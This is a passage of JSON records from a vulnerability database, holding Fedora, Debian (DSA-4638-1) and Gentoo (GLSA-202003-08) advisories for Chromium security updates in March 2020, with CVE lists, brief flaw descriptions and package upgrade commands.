"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-20446", "CVE-2019-20503", "CVE-2020-10531", "CVE-2020-6378", "CVE-2020-6379", "CVE-2020-6380", "CVE-2020-6381", "CVE-2020-6382", "CVE-2020-6383", "CVE-2020-6384", "CVE-2020-6385", "CVE-2020-6386", "CVE-2020-6387", "CVE-2020-6388", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6391", "CVE-2020-6392", "CVE-2020-6393", "CVE-2020-6394", "CVE-2020-6395", "CVE-2020-6396", "CVE-2020-6397", "CVE-2020-6398", "CVE-2020-6399", "CVE-2020-6400", "CVE-2020-6401", "CVE-2020-6402", "CVE-2020-6403", "CVE-2020-6404", "CVE-2020-6405", "CVE-2020-6406", "CVE-2020-6407", "CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6410", "CVE-2020-6411", "CVE-2020-6412", "CVE-2020-6413", "CVE-2020-6414", "CVE-2020-6415", "CVE-2020-6416", "CVE-2020-6417", "CVE-2020-6418", "CVE-2020-6420", "CVE-2020-6422", "CVE-2020-6424", "CVE-2020-6425", "CVE-2020-6426", "CVE-2020-6427", "CVE-2020-6428", "CVE-2020-6429", "CVE-2020-6449"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "modified": "2020-03-27T10:46:23", "published": "2020-03-27T10:46:23", "id": "FEDORA:6395E630FBA4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: chromium-80.0.3987.149-1.fc30", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2021-01-11T01:25:17", "bulletinFamily": "unix", "cvelist": ["CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6395", "CVE-2020-6381", "CVE-2020-6394", "CVE-2020-6397", "CVE-2020-6399", "CVE-2020-6392", "CVE-2020-6387", "CVE-2020-6412", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6407", "CVE-2020-6416", "CVE-2020-6410", "CVE-2020-6386", "CVE-2020-6396", "CVE-2020-6383", "CVE-2020-6385", "CVE-2020-6401", "CVE-2019-19926", "CVE-2019-19925", "CVE-2020-6414", "CVE-2020-6391", "CVE-2020-6420", "CVE-2020-6411", "CVE-2019-19880", "CVE-2020-6400", "CVE-2020-6398", "CVE-2020-6388", "CVE-2020-6413", "CVE-2019-19923", "CVE-2020-6415", "CVE-2020-6404", "CVE-2020-6382", "CVE-2020-6403", "CVE-2020-6406", "CVE-2020-6402", "CVE-2020-6418", "CVE-2020-6405", "CVE-2020-6384", "CVE-2020-6393"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4638-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nMarch 10, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2019-19880 CVE-2019-19923 CVE-2019-19925 CVE-2019-19926\n CVE-2020-6381 CVE-2020-6382 CVE-2020-6383 CVE-2020-6384\n CVE-2020-6385 CVE-2020-6386 CVE-2020-6387 CVE-2020-6388\n CVE-2020-6389 CVE-2020-6390 CVE-2020-6391 CVE-2020-6392\n CVE-2020-6393 CVE-2020-6394 CVE-2020-6395 CVE-2020-6396\n CVE-2020-6397 CVE-2020-6398 CVE-2020-6399 CVE-2020-6400\n CVE-2020-6401 CVE-2020-6402 CVE-2020-6403 CVE-2020-6404\n CVE-2020-6405 CVE-2020-6406 CVE-2020-6407 CVE-2020-6408\n CVE-2020-6409 CVE-2020-6410 CVE-2020-6411 CVE-2020-6412\n CVE-2020-6413 CVE-2020-6414 CVE-2020-6415 CVE-2020-6416\n CVE-2020-6418 CVE-2020-6420\n\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2019-19880\n\n Richard Lorenz discovered an issue in the sqlite library.\n\nCVE-2019-19923\n\n Richard Lorenz discovered an out-of-bounds read issue in the sqlite\n library.\n\nCVE-2019-19925\n\n Richard Lorenz discovered an issue in the sqlite library.\n\nCVE-2019-19926\n\n Richard Lorenz discovered an implementation error in the sqlite library.\n\nCVE-2020-6381\n\n UK's National Cyber Security Centre discovered an integer overflow issue\n in the v8 javascript library.\n\nCVE-2020-6382\n\n Soyeon Park and Wen Xu discovered a type error in the v8 javascript\n library.\n\nCVE-2020-6383\n\n Sergei Glazunov discovered a type error in the v8 javascript library.\n\nCVE-2020-6384\n\n David Manoucheri discovered a use-after-free issue in WebAudio.\n\nCVE-2020-6385\n\n Sergei Glazunov discovered a policy enforcement error.\n\nCVE-2020-6386\n\n Zhe Jin discovered a use-after-free issue in speech processing.\n\nCVE-2020-6387\n\n Natalie Silvanovich discovered an out-of-bounds write error in the WebRTC\n implementation.\n\nCVE-2020-6388\n\n Sergei Glazunov discovered an out-of-bounds read error in the WebRTC\n implementation.\n\nCVE-2020-6389\n\n Natalie Silvanovich discovered an out-of-bounds write error in the WebRTC\n implementation.\n\nCVE-2020-6390\n\n Sergei Glazunov discovered an out-of-bounds read error.\n\nCVE-2020-6391\n\n Micha\u0142 Bentkowski discoverd that untrusted input was insufficiently\n validated.\n\nCVE-2020-6392\n\n The Microsoft Edge Team discovered a policy enforcement error.\n\nCVE-2020-6393\n\n Mark Amery discovered a policy enforcement error.\n\nCVE-2020-6394\n\n Phil Freo discovered a policy enforcement error.\n\nCVE-2020-6395\n\n Pierre Langlois discovered an out-of-bounds read error in the v8\n javascript library.\n\nCVE-2020-6396\n\n William Luc Ritchie discovered an error in the skia library.\n\nCVE-2020-6397\n\n Khalil Zhani discovered a user interface error.\n\nCVE-2020-6398\n\n pdknsk discovered an uninitialized variable in the pdfium library.\n\nCVE-2020-6399\n\n Luan Herrera discovered a policy enforcement error.\n\nCVE-2020-6400\n\n Takashi Yoneuchi discovered an error in Cross-Origin Resource Sharing.\n\nCVE-2020-6401\n\n Tzachy Horesh discovered that user input was insufficiently validated.\n\nCVE-2020-6402\n\n Vladimir Metnew discovered a policy enforcement error.\n\nCVE-2020-6403\n\n Khalil Zhani discovered a user interface error.\n\nCVE-2020-6404\n\n kanchi discovered an error in Blink/Webkit.\n\nCVE-2020-6405\n\n Yongheng Chen and Rui Zhong discovered an out-of-bounds read issue in the\n sqlite library.\n\nCVE-2020-6406\n\n Sergei Glazunov discovered a use-after-free issue.\n\nCVE-2020-6407\n\n Sergei Glazunov discovered an out-of-bounds read error.\n\nCVE-2020-6408\n\n Zhong Zhaochen discovered a policy enforcement error in Cross-Origin\n Resource Sharing.\n\nCVE-2020-6409\n\n Divagar S and Bharathi V discovered an error in the omnibox\n implementation.\n\nCVE-2020-6410\n\n evil1m0 discovered a policy enforcement error.\n\nCVE-2020-6411\n\n Khalil Zhani discovered that user input was insufficiently validated.\n\nCVE-2020-6412\n\n Zihan Zheng discovered that user input was insufficiently validated.\n\nCVE-2020-6413\n\n Micha\u0142 Bentkowski discovered an error in Blink/Webkit.\n\nCVE-2020-6414\n\n Lijo A.T discovered a policy safe browsing policy enforcement error.\n\nCVE-2020-6415\n\n Avihay Cohen discovered an implementation error in the v8 javascript\n library.\n\nCVE-2020-6416\n\n Woojin Oh discovered that untrusted input was insufficiently validated.\n\nCVE-2020-6418\n\n Clement Lecigne discovered a type error in the v8 javascript library.\n\nCVE-2020-6420\n\n Taras Uzdenov discovered a policy enforcement error.\n\nFor the oldstable distribution (stretch), security support for chromium has\nbeen discontinued.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 80.0.3987.132-1~deb10u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2020-03-11T00:47:27", "published": "2020-03-11T00:47:27", "id": "DEBIAN:DSA-4638-1:8959D", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2020/msg00041.html", "title": "[SECURITY] [DSA 4638-1] chromium security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2020-03-13T06:35:35", "bulletinFamily": "unix", "cvelist": ["CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6395", "CVE-2019-13764", "CVE-2019-13763", "CVE-2019-13759", "CVE-2020-6381", "CVE-2019-13758", "CVE-2019-13730", "CVE-2020-6394", "CVE-2020-6397", "CVE-2019-13736", "CVE-2019-13745", "CVE-2020-6377", "CVE-2019-13746", "CVE-2020-6399", "CVE-2020-6392", "CVE-2020-6387", "CVE-2019-13753", "CVE-2020-6412", "CVE-2020-6389", "CVE-2019-13740", "CVE-2020-6390", "CVE-2020-6407", "CVE-2019-13728", "CVE-2019-13741", "CVE-2020-6416", "CVE-2020-6410", "CVE-2019-13742", "CVE-2020-6396", "CVE-2019-13749", "CVE-2019-13750", "CVE-2020-6385", "CVE-2019-13738", "CVE-2019-13734", "CVE-2020-6401", "CVE-2020-6414", "CVE-2019-13735", "CVE-2020-6391", "CVE-2020-6420", "CVE-2019-13724", "CVE-2020-6411", "CVE-2020-6400", "CVE-2020-6398", "CVE-2020-6388", "CVE-2020-6413", "CVE-2019-13756", "CVE-2019-13754", "CVE-2019-13723", "CVE-2019-13761", "CVE-2019-13727", "CVE-2019-13762", "CVE-2019-13726", "CVE-2020-6415", "CVE-2020-6379", "CVE-2019-13748", "CVE-2019-13755", "CVE-2020-6380", "CVE-2019-13767", "CVE-2019-13729", "CVE-2019-13732", "CVE-2020-6404", "CVE-2019-13744", "CVE-2019-13757", "CVE-2020-6382", "CVE-2020-6403", "CVE-2020-6406", "CVE-2019-13743", "CVE-2019-13751", "CVE-2019-13739", "CVE-2020-6402", "CVE-2020-6418", "CVE-2019-13725", "CVE-2019-13752", "CVE-2019-13737", "CVE-2020-6378", "CVE-2020-6393", "CVE-2019-13747"], "description": "### Background\n\nChromium is an open-source browser project that aims to build a safer, faster, and more stable way for all users to experience the web. \n\nGoogle Chrome is one fast, simple, and secure browser for all your devices. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Chromium and Google Chrome. Please review the referenced CVE identifiers and Google Chrome Releases for details. \n\n### Impact\n\nA remote attacker could execute arbitrary code, escalate privileges, obtain sensitive information, spoof an URL or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Chromium users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/chromium-80.0.3987.132\"\n \n\nAll Google Chrome users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/google-chrome-80.0.3987.132\"", "edition": 1, "modified": "2020-03-13T00:00:00", "published": "2020-03-13T00:00:00", "id": "GLSA-202003-08", "href": "https://security.gentoo.org/glsa/202003-08", "title": "Chromium, Google Chrome: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}